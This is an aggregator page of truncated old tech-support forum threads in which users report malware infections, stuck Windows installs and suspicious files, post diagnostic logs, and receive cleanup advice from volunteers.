i have also installed ubuntu that deletes file tmprarily on restarting ".trash=100" is again same place
techiees.....i hate these file i m not in mood to format my pc.

A:want to delete a malicious file ".trash-1000" from my pc.

I dont think they are virus's buddy, simply, system folders.

8 more replies
Answer Match 40.32%

first of all, hello to you all

as they thread title may allude; i am a little disgruntled at my first atempt to install my brand new genuine Windows 7 x64 Home Premium OEM

after the first 4 attempts at installing Win7 i managed to get around the installer asking for 'unknown device driver' by unplugging my card reader. I have been running XP x64 OEM for some time and have re-installed it at least 5 times and have never had any problems what so ever; if only the same were true for Win7!

having done some research it became clear that Win7 should take no more then 30-40 minutes to install; but here i am 23hrs later and it STILL hasn't even started installing yet; its still 'unpacking windows files' @ 99%...

has anyone else had this problem? if so, what did you do to fix it?

thanks in advance

A:23hrs - "unpacking windows files"

Welcome to Seven Forums.

Nice job on the system specs.

Sorry your having problems.
How long has it been at 99%?

We've made a list of questions which are the result of reoccurring incidents seen so far.
If you can have a look at these and give us your answers we'll be able to give you better suggestions.

Questions to use for help with Installation Issues

We have also seen people with AMD mother boards having these problems, try taking out all memory cards except one, if that doesn't work then move the memory card to a different slot and try again.

Do you have HyperTransport function settings in your BIOS?
There are two options in the BIOS Setup called K8 -- KN HT Speed and K8 -- KN HT Width, both are normally set as Auto. Change them to K8 -- KN HT Speed to 1x and K8 <-> KN HT Width to 8 8. You can change them back after the install.

If this doesn't work, then reply with more details and we'll try again.
EDIT:
Just read a thread where a guy with an AMD board was having similar problems said he turned off 'Cool 'n Quiet' setting (the feature that turns down the fan RPM). He also found a bad RAM stick by running memtest86+. After that Win7 installed with no problem. Might be worth a try.

4 more replies
Answer Match 39.9%

Hi,
I have Dell Inspiron E1405 with Win XP SP3. For last 15 days I am infected with rootkit-agent.sys and tried every malware/antivirus/spyware tool suggested by "am i affected forum". since the rootkit could not be fixed, I was advised to visit HJT forum. need help.
I keep getting rootkit detected message by my AVG.
I am pasting DDS below and also attaching the "attach" file.
request your attention.
regards
g10

**************

DDS (Ver_09-06-26.01) - NTFSx86
Run by first at 22:50:06.40 on Thu 07/23/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.372 [GMT 5.5:30]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\stsystra.exe
... Read more

A:infected with rootkit-agent.di ndis.sys file is infected

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

11 more replies
Answer Match 39.48%

Please review steps already taken here:

http://www.bleepingcomputer.com/forums/topic435318.html/page__gopid__2531767#entry2531767

DDS results:
.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_30
Run by HP at 23:13:02 on 2011-12-31
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8174.5429 [GMT -5:00]
.
AV: Norton Internet Security *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Internet Security *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Hpservice.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\vcsFPService.exe
C:... Read more

A:Infected MBR - Norton power eraser says rikvm_C6F09094.sys is a bad file but the file remains and never gets fixed

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. [/b]If you are unsure about any of these caracteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about y... Read more

21 more replies
Answer Match 39.48%

Hi... I was wondering if anyone else is having same problem as me when trying to install the 32-bit RC. I have created a 50 gigs logical partition on my hard drive to install windows 7 on (i'm using Vista Home Premium on my Dell laptop). on installation screen i select the drive for the new installation and so it goes to the next screen where it shows a list of bunch of stuff that it's supposed to do. The first one is "copying files" or something along those lines which gets checked and so it moves to the second thing that is i believe called unpacking the installation files (or something similar). My installation "freezes" there as it shows 0% for about an hour or two and then it errors and cancels the installation.
any help would be much appreciated.
Cheers

A:"unpacking" problem in RC installation

Hi,houman

Try re-burning the iso at 4X speed with imgburn

3 more replies
Answer Match 38.22%

While surfing the web, Norton came up and said that C:\Windows\dlm.exe was infected with a Trojan virus. It could neither repair nor quarantine the file, and I was not sure if I should hastily delete it or not. I stumbled upon this site and saw others with similar cases. So, I downloaded Hijack This and ran a scan. Here's the log below. Thanks to anyone willing to help!
Logfile of HijackThis v1.97.7
Scan saved at 6:14:04 PM, on 12/04/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\lexbces.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\LEXPPS.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\System32\carpserv.exe
C:\Program Files\QuickTime\qttask.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\LXSUPMON.EXE
C:\WINDOWS\System32\CTHELPER.EXE
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
C:\WINDOWS\dl.exe
C:\WINDOWS\dlm.exe
C:\PROGRA~1\Proc Ford Software\Wave road regs.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe
C:\WINDOWS\System32\CTsvcCDA.exe
C:\Progr... Read more

A:Infected File, Can't Quarantine - Log File Included

Have a look at this thread http://forums.techguy.org/showthread.php?threadid=215474&90068ef66b0d48b4d35365630275933b
 

1 more replies
Answer Match 38.22%

Hello TSG Forum:

I am using Norton AV on Win 2K. An incoming email set off the AV this morning, and it said that there was a virus on my computer. In the activity log it says:

The file
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NAV23.tmp
is infected with the [email protected]!enc virus.
Unable to repair this file.
Access to the file was denied.

But, when I go to this directory C:\Documents and Settings\Administrator\Local Settings\Temp I can't see any file in there called NAV23.tmp (I have switched on 'show hidden files'.) Also, if I do a scan of that folder (or the entire hard-drive) it comes back virus free. My questions are:

1. Why can I not find the file NAV23.tmp on my computer since the AV says it is infected with a virus.

2. What is going on here? Does the virus copy itself to some other file and delete the NAV23.tmp? Why does the AV scan say computer is virus free? Is something else going on I should know about?

Thanks.
 

A:Norton AV: Says File is Infected, But Can't Find File.

9 more replies
Answer Match 37.38%

Bit of a wierd 1.

Turned on my machine today, went to the toilet and came back and Avast was asking to restart my computer and do a full scan from boot up. I said yes but cancelled it because it was taking too long.

I go look in virus chest and I noticed that tier0_s.dll from my steam folder is sitting in there, and that it was transfered in there today. But where it says "Virus description", it says "--no virus--"

What does this mean? Is it some kind of false positive? Did I screw things up by cancelling the scan?

A:Avast says I have an infected file...which isn't infected

O.k, bit of research and looking on the Avast forums and it looks like it's a false positive

2 more replies
Answer Match 35.7%

My word Docx file got damaged due to virus infected Docx file, I have crucial important data lost so how to repair corrupted Docx files. If you have any solution for recover and repair my corrupted Docx file, please assist me.
 

A:My word Docx file got damaged due to virus infected Docx file

8 more replies
Answer Match 34.44%

Moderators/admins...plz shift this topic to appropriate category.I was searching a txt file on google and i opened also several txt files. I also scanned them with my nod32 anti-virus...but i have read at many places that txt/document files do not or cannot contain virus. and some places i have read that it might contain virus, i.e- it can have some scripts inside them that can allow virus to download from the internet.Is that true?? can a document file or a txt file get infected??? I am damn confused cannot find an answer to this question...Can u guys help me ??Thanks!!

A:Can A Txt File Be Infected?

.TXT is a file extension specially associated with text files. If the file is actually a true text file, it cannot execute a virus. However, the file could contain malicious code and actually be an executable disguised as a text file. This is done by adding an executable extension (.exe, .pif, .com, .vbs, etc) to the end of .txt such as document.txt.exe so that it appears to be a text file. In some cases, you may not see the double extension because it is named with extra spaces before the ".exe" extension such as document.txt.................exe. The real extension is hidden because the column width is too narrow to reveal the complete name and the tiny dots in between are nearly invisible.In other cases the malware may attach a .doc or .txt file found on a system while scanning for message body texts so it can send information back to a remote attacker. An example of this is the Email-Worm.Win32.Magistr.a. It is possible to get infected by a virus that activates when reading an email without an attachment. The Wscript.KakWorm was spread by taking advantage of a security hole in Microsoft Outlook Express. The worm was hidden in the HTML of the email itself and when the message was viewed by the recipient, the worm automatically infected the computer.I have encountered "false positive" detections on some plain text files triggered by Corporate Editions of McAfee and Norton Anti-virus which uses heuristic algorithms known as Bloodhound. In these cases, I su... Read more

1 more replies
Answer Match 34.44%

Hi.

I have a computer that has been infected. I have run malwarebytes and SuperAntiSpyware and it removes the programs. However, it is still coming back through a file called dkqfmeo.dat which is located in a temp folder for a domain user. Whenever I try to delete the program, I get access is denied. I have tried running unlocker and it does not work on the file. Unfortunately, this computer is in a remote location so the only way I have access to it is by remote desktop or by using the share name. I am in a dire situation here and I have tried everything that I could try.

Please help.

More replies
Answer Match 34.44%

This is my first time in this forum. I joined here, hoping that someone might be able to help me. About a week or more ago I installed a "Active Desktop Calendar" by Xemi Computers Ltd. Now I notice My D: drive is constantly being written to, approximately 3 megs every 5 minutes. I have now disabled the auto-start for this application, and it is no longer being written to. So far, it has used up more than 2 Gigs of disk space, and have no idea what files they are. I would really appreciate it if anyone knows anything about this, or whether it is a virus or not.
 

A:Win.sys file infected

13 more replies
Answer Match 34.44%

my pc is running slow.have removed some adware and spyware and still very slow.cannot remove files please help

A:infected file

Welcome to TSF.

Please download HijackThis. Create a folder at C:\HJT and move HijackThis.exe there. Run a scan and save the log file. Post the whole log file here. Do not fix anything since most of them listed there are harmless (some are system required). This program will help us determine if there is any spyware/malware on your computer.

1 more replies
Answer Match 34.44%

So I got infected when I accidentally opened a file that my friend sent me on steam.
 
THIS FILE ---> Moderator edit: link removed for safety purposes. BC Members with sufficient forum access can find the file here.
 
I just entered this website and wanted to zoom in the picture so i clicked it and it downloaded this file. I've opened it from my browser window and didn't payed attention to the format(my bad). Then I recived a message from previously mentioned friend that it's a virus but it was too late to react. I've already opened it and from my knowledge it send out this link to my every contact... I've launched task manager and killed it then deleted the file and remains. I really don't know what I'm dealing with, because Kaspersky Internet Security did not reacted to it at all. So far I used Kaspersky Internet Security, Malwarebytes Anti- Malware, Kaspersky's TDSSKiller. I've ran many different scan options(almost every) and it tells me my computer is clean. I've also checked HiJackThis to make sure that it isn't a keylogger but I couldn't find one. I've changed my password email and steam password just to be sure. Am I safe or do I need to wipe my hard drive to get rid of it once and for all? I don't want to lose my hard earned cash.
 
@edit
Forgot to mention system is Windows 7 64bit.

A:Got infected by the .SRC file.

Hello there    
 
I'm LighthouseParty and I'll be assisting you with your concern today. Please keep in mind that I have a few guidelines I need you to follow:
Don't run any other tools other than what I provide you with.
Don't install/remove any programs other than what I provide you with.
Don't perform a system restore unless I ask you to. 
 Download MiniToolBox
Click here to download MiniToolBox to your desktop.
Double click MiniToolBox.
Select the following and then press go.
Post the log in your next reply.
Flush DNS
Reset IE Proxy Settings
Reset FF Proxy Settings
List Installed Programs
List Restore Points
 
 Install and run a scan with Malwarebytes Anti-Malware
Click here to download Malwarebytes to your desktop.
Double click mbam-setup-x.x.x.xxxx and follow the on-screen instructions.
On the dashboard, click update now.
After that, click scan now - the scan will now begin.
When the scan's completed, select apply actions - make sure the action is quarantine.
Restart your computer.
How to get the log.
On the dashboard, select the history tab and click application logs.
Select the log which has the time and date of when you did the scan.
Click copy to clipboard and paste it into your reply.
 Download Security Check
Click here to download Security Check to your desktop.
Double click SecurityCheck and follow the on-screen instructions.
A log should open, called checkup... Read more

8 more replies
Answer Match 34.44%

I have posted on your forum several days ago and yet no reply, hopefully I can find someone in here to help.

After recovering from virtumonde and using combofix, I started to notice my computer games were slowing down. I checked my computer processes and the wmiprvse.exe would pop up intermittently. Also my mouse's hourglass would occasionally flicker 3 times in rapid succession, even when the computer is idle. Also a wave sound would play (associated with an error dialog box) occasionally, yet no box/popup ever appeared. Please view my screen shots of the wmiprvse.exe
Thanks, ~Ed

PS I read the rules/regulation on posting picture files or any other information onto this forum.

A:IS THIS AN INFECTED FILE?!

Unfortunately your links go to a location requiring a password.

3 more replies
Answer Match 34.44%

Hello all, firstly thanks to this website I have learnt more here in 2 days that would have taken 2yr's reading in books.

Unfortunately I was suffering with pop ups from the winfixer/Winantivirus scam. After following the tutorial on how to remove them. My Sophos anti virus detected a virus, the file infected is $win079.dll. Now Sophos couldn't move or delete the file. I have tried to delete this file myself manually via normal and safe modes but with no success. Is there anything else I could try to get rid of this file? I don't know if this is the cause of the pop ups but once I remove this file, I'll at least know what else may be causing the problems.

Thanks for your help in advance.

A:Infected Dll File But Can't Get Rid Of It.

Welcome to BC !Install Super Antispyware. Run it in safe mode. Allow it to quarantine whatever it finds. http://www.superantispyware.com/Run the online scan for Bit Defender in normal mode. Allow it to quarantine whatever it finds.http://www.bitdefender.com/scan8/ie.html--------------------------------------------------------------------------------Post a Hijack This log in the Hijack This Forum by following the directions in the link below if the programs above have not removed ALL malware. DO NOT post the log in this forum.http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/ --------------------------------------------------------------------------------Getting into Windows Safe Modehttp://www.computerhope.com/issues/chsafe.htm(pre-Vista OS's)

4 more replies
Answer Match 34.44%

I ran NAV last nite and it said it couldn't fix this file ebclafdf.exe. Anybody familiar with this file?
Thanks in advance.
 

A:Infected file??

13 more replies
Answer Match 34.44%

Well I'm not having any problem with my computers but I was just doing my virus can today and I found a couple of infected files. I don't really know whether to remove it or quarantine it, so I'm asking for assistance.
Heres my log

Scan Started Thu Aug 23 11:02:23 2007

-------------------------------------------------------------------------------

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\Local Settings\Temp\hsperfdata_Chau\912, Permission denied

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\Local Settings\Temporary Internet Files\Content.IE5\ONZZ609L\9da142ad29ed3110ef11649b1b2e1d6216c0f34f89cd201c1671fa51d731adfc8933fae2841c3c87b14665b2bfcef79db3a54130b98f565f672342e50be8032b797bae1a10270db38a2491,;ord=118775877587?N?!?O?!??@, No such file or directory

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\My Documents\Azureus Downloads\Macromedia Studio 8 Full Edition.(Flash Dreamweaver Fireworks)+Keygen\Macromedia Studio 8 Full Edition.(Flash Dreamweaver Fireworks)+Keygen\Macromedia Studio 8 Full Edition\Beweisfoto_Paypal.jpg.jpg_H?!I?!??@, No such file or directory

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\My Documents\Azureus Downloads\Macromedia Studio 8 Full Edition.(F... Read more

A:Infected File

What program produced the log? Dr. Web? It is safe to quarantine these files. If at a later date you find you need them or they are false/positives, you can restore them.You should use the programs below to confirm you are malware free or find and remove other malware. Install Super Antispyware. Run it in safe mode. Allow it to quarantine whatever it finds. http://www.superantispyware.com/Run the online scan for Bit Defender in normal mode. Allow it to quarantine whatever it finds.http://www.bitdefender.com/scan8/ie.htmlPlease let us know the results.

4 more replies
Answer Match 34.44%

hi i have an infected file in windows temp folder and cant seem to delete it also my hijackthis isnt working right
 

More replies
Answer Match 34.44%

sorry posted in the wrong forum seem to have an infected file in my windows temp folder and cant delete it,keep getting warnings of a trojan pop up.also my hijackthis doesnt work properly.
 

A:infected file

16 more replies
Answer Match 34.44%

This file in downloads section in windows is infected. I was told to delete it but it won't.How do i get past anything thats keeping me from deleting it? {E2883E8F-472F-4FB0-9522-AC9BF37916A7}
 

A:infected file

7 more replies
Answer Match 34.44%

hi.im infected. i have mcaffee security center.i think im infected by recycler.exe.i have a hard drive partitioned into two: Drive C/Di cant double clicked on them to open. i have to right click then open. because it has autorun.furthermore, i have these files that i think may caused this to happen. the files are:1. zeluR maeTCP.exe2. Gwen(ISU) Scandal.exe3. Sex Video.exewhen i delete them they just keep coming back.here is my hijackthis log:Logfile of HijackThis v1.99.1Scan saved at 12:35:01 PM, on 3/29/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\WINDOWS\System32\GEARSec.exec:\program files\mcafee.com\agent\mcdetect.exec... Read more

A:My Log File: Help Im Infected

Hello bornok, I am SifuMike and I will be helping you. Sorry for the delay, it's been pretty busy here lately. Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update. Updating Java: Download the latest version of Java Runtime Environment (JRE) 6. Scroll down to where it says "Java Runtime Environment (JRE) 6". Click the "Download" button to the right. Check the box that says: "Accept License Agreement". The page will refresh. Click on the link to download Windows Offline Installation, Multi-language jre-6-windows-i586.exe and save to your desktop. Close any programs you may have running - especially your web browser. Go to Start > Control Panel double-click on Add/Remove programs and remove all older versions of Java. Check any item with Java Runtime Environment (JRE or J2SE) in the name. Click the Remove or Change/Remove button. Repeat as many times as necessary to remove each Java versions. Reboot your computer once all Java components are removed. Then from your desktop double-click on jre-6-windows-i586.exe to install the newest version.****************** Disable your antivirus program and go here http://www.bitdefender.com/scan8/ie.html and run an online scan with BitDefender (you will need to use Internet Explorer for this scan). When the ActiveX Control has loaded, click on "Click here to scan&... Read more

2 more replies
Answer Match 34.44%

First notice most files disappeared. Restarted computer in safe-mode, changed the setting of view folder options to show hidden files and operating systm files. After applying the setting it's always reversed to not showing hidden files. All spaces are still occupied as displayed in properties of the folder.

Noticed more virus message

A potentail disk failure may cause loss of files, applications and documents store on the hard disk ........ and force to "scan and fix" or "cancel and reboot"

"RAM memory reliability is extremely low ...."

"Cirtical error hard driver critical error. Start a system diagnostics application to scan your hard disk for errors and performance problems."

And task manager is blocked. MBAM is also blocked even in safe most. Downloard DDS.scr but it never ends.

A:infected and need help - most file hid

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/427723 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Answer Match 34.44%

Hi, I downloaded an winrar file from 4chan and I saw an .src file in it, i didn't extract it, I immediatly delete it. But i also extract an other file in the same archive (a video) which i did not run either and deleted right after the extraction was complete. 
So i did not run the src file but can i be infected ? (from 4chan it's obviously a trojan) 
 
Sorry for my poor english i'm not an native english speaker.
Thank you

A:Am I infected ? src file in rar

A file with the .src file extension is known as a source code fileRead more : http://www.ehow.com/facts_5700957_file-extension-src_.htmlThat said you may have obtained a rogue file..Why not run these and be sure about infection.MiniToolBoxPlease download MiniToolBox, save it to your desktop and run it.Checkmark the following checkboxes:Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Users, Partitions and Memory size.Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run. Note: When using "Reset FF Proxy Settings" option Firefox should be closed.AdwCleanerPlease download AdwCleaner by Xplode and save to your Desktop.Double click on AdwCleaner.exe to run the tool. Vista/Windows 7/8 users right-click and select Run As AdministratorClick on the Scan button.AdwCleaner will begin...be patient as the scan may take some time to complete.After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.Copy and paste the contents of that logfile in your next reply.A copy of all logfiles are saved in the C:\Ad... Read more

5 more replies
Answer Match 34.44%

info: 
File is for a GTA V  modified save game, after opening the file in notepad+ i see that it's not for PS4 but for PS3.
I'm concerned about my ps4 and it wasn't the best idea to try modify my save game. 
I have scanned the file and nothing was found. I can provide links to the file / YouTube video with permission.
questions:
Can my ps4 get infected from having my USB with the file plugged in, i did not over write anything as it was for ps3.
Thanks.

More replies
Answer Match 34.44%

I cant open a word document from another pc transfered through a flash. When i click it just showsbthat ive clicked on it but it does not open it.
Please help
 

A:i think my file is infected

hey
USB flash drives removed without clicking the "safely remove icon" sometimes files corrupt or make the drive useless.may be you did the same thing and word document is not opening.
use built- in recovery option to recover the file :
In Word go to File click Open and select the document from the location .
Click the document from the location then click the arrow along with Open option and select "Open and Repair"
if inbuilt method does not work then online free tools are available for recovering word document .
 

3 more replies
Answer Match 34.44%

ok this file is infecton on my system Win32/SillyDI.AGC
my anti-virus keeps having to re-delete it.... what do i do?

A:file infected

Hi the_aggie10,

Please follow the five-step directions in my signature and post a new HijackThis log to this thread when you are done.

7 more replies
Answer Match 34.44%

On-lone virus scan said I have an infected file called PE_HANTANER.A located in C:\_RESTORE\ARCHIVE\FS311.CAB but when try to delete the file it says file is in use and won't let me delete it. What should I do?
 

A:Infected File

6 more replies
Answer Match 34.44%

a few days ago my computer got some kind of virus. it says mbr: alureon-k (rtk) i ran malwarebytes and it removed some things. i also have avg anti-virus program. but my computer still isn't right. here is a log of aswmbr. please help me!!!!! thank you.

aswMBR version 0.9.8.986 Copyright(c) 2011 AVAST Software
Run date: 2011-11-29 14:48:16
-----------------------------
14:48:16.750 OS Version: Windows 5.1.2600 Service Pack 3
14:48:16.750 Number of processors: 1 586 0x207
14:48:16.750 ComputerName: VALUED-CB7D4C82 UserName: robert
14:48:23.781 Initialize success
14:48:28.093 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
14:48:28.093 Disk 0 Vendor: SAMSUNG_SV8004H QR100-12 Size: 76351MB BusType: 3
14:48:28.093 Disk 1 \Device\Harddisk1\DR3 -> \Device\00000071
14:48:28.093 Disk 1 Vendor: Sony 0000 Size: 76351MB BusType: 0
14:48:30.125 Disk 0 MBR read successfully
14:48:30.125 Disk 0 MBR scan
14:48:30.125 Disk 0 Windows XP default MBR code
14:48:30.125 Disk 0 scanning sectors +156360645
14:48:30.218 Disk 0 scanning C:\WINDOWS\system32\drivers
14:48:43.812 Service scanning
14:48:44.437 Service sptd C:\WINDOWS\System32\Drivers\sptd.sys **LOCKED** 32
14:48:44.984 Modules scanning
14:49:08.281 Disk 0 trace - called modules:
14:49:08.296 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll atapi.sys spux.sys >>UNKNOWN [0x8a416938]<<
14:49:08.296 1 nt!IofCallDriver -> \Device\Harddisk... Read more

A:file mbr o is infected???

Hello, and welcome to TSF.

I am currently reviewing your log. I will be back with a fix for your problem as soon as possible.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.

19 more replies
Answer Match 34.02%

I have two entries that are in my AVG 7.0 Free Virus Vault. The file is named "TFTP836" and was located at C:\Windows\System32\TFTP836, with a file size of 185kb before AVG moved it to its Vault. I tried searching Google for information on this file and found no help. Has anyone got any information on what this file is, what it does and whether it is safe to remove?

This file has been carried over from the AVG 6.0 Free Virus Vault and I am using Windows 2000 Professional. I already use Ad-Aware SE Personal, Spybot Search and Destroy 1.3 and HiJack This to make sure my computer isn't filled with ad-aware. I am stumped about this detection, though and I know Grisoft has a "support" forum but they have yet to respond at all. I thought perhaps someone else may have had the same file detected once upon a time or have any clue on the suspected file. I have had no problems with the file being out of use whilst it resides in the virus vault, which stops it from being used, accessed or have any activity at all.

The file is considered infected and unable to be "healed", my only option would be to delete and I would but I'm curious about what it is, what it does before I say adios to it for good.

Any help would be appreciated.
 

A:Unidentified 'infected' file

This is a good site for identifying viruses if you can upload the file to it (uses 8 separate AVs) -

http://virusscan.jotti.dhs.org/

- but what I don't know is whether you can upload the quarantined version of the file successfully or if the AV scans could i.d. the quarantined version. I guess you could restore the full file from the vault and then upload it but that may risk infecting your system of course, unless AVG will immediately halt it in it's tracks. I agree with you though it's nice to know exactly what critter it is you're dealing with, before deleting it.
 

2 more replies
Answer Match 34.02%

I am getting an error message from AOL safety.
It reads "We found and were not able to clean or block a virus infected file. (C:\windows\system32\winlogon.exe)
My operating system is Windows XP.
Could anyone please help me with this????
 

A:Virus infected file

6 more replies
Answer Match 34.02%

My firewall stopped SVC Host from connecting outbound. The report read that something had commanded it to connect and was closing that application.

When I cleaned out my offline files and history, all of my cookies except four were also gone. I have my machine set to where it only allows the cookies I accept, and never erase them.

I ran Spybot and get this as a threat: Win32.Agent.pz path:C:\windows\system32\wnspoem\.

Shortly after this threat appears on the screen, but before the scan is complete, the computer will shut off and will not restart until I unplug it.

The same happens when I run AVG, except I don't get an error before the system shuts down. NOD32 comes up clean.

I restored to a known good point, and at least I can boot up, where as before it would boot, shut down and reboot continiously.

All of my saved login names and passwords are also missing and have to be re-entered.

The system runs great until I try to scan.

Here is my log. All help is greatly appreciated.
Logfile of HijackThis v1.99.1
Scan saved at 2:54:15 AM, on 5/20/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Grisoft\AVG An... Read more

A:I have been infected!! HJT file included.

